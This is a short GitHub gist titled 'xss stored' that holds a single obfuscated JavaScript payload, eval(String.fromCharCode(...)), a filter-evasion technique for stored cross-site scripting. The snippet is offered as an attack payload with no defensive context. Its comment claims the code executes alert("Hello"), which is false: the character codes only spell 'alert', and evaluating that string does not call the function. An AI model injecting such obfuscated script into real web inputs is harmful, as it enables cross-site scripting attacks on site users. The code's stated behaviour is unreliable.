Skip to content

Instantly share code, notes, and snippets.

@c0d3x27
Created January 14, 2025 00:42
Show Gist options
  • Save c0d3x27/652d808a3a73b2555bfdc09dd0dffb94 to your computer and use it in GitHub Desktop.
Save c0d3x27/652d808a3a73b2555bfdc09dd0dffb94 to your computer and use it in GitHub Desktop.
xss stored
eval(String.fromCharCode(97, 108, 101, 114, 116));
// Output: alert("Hello"); (executes the alert)
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment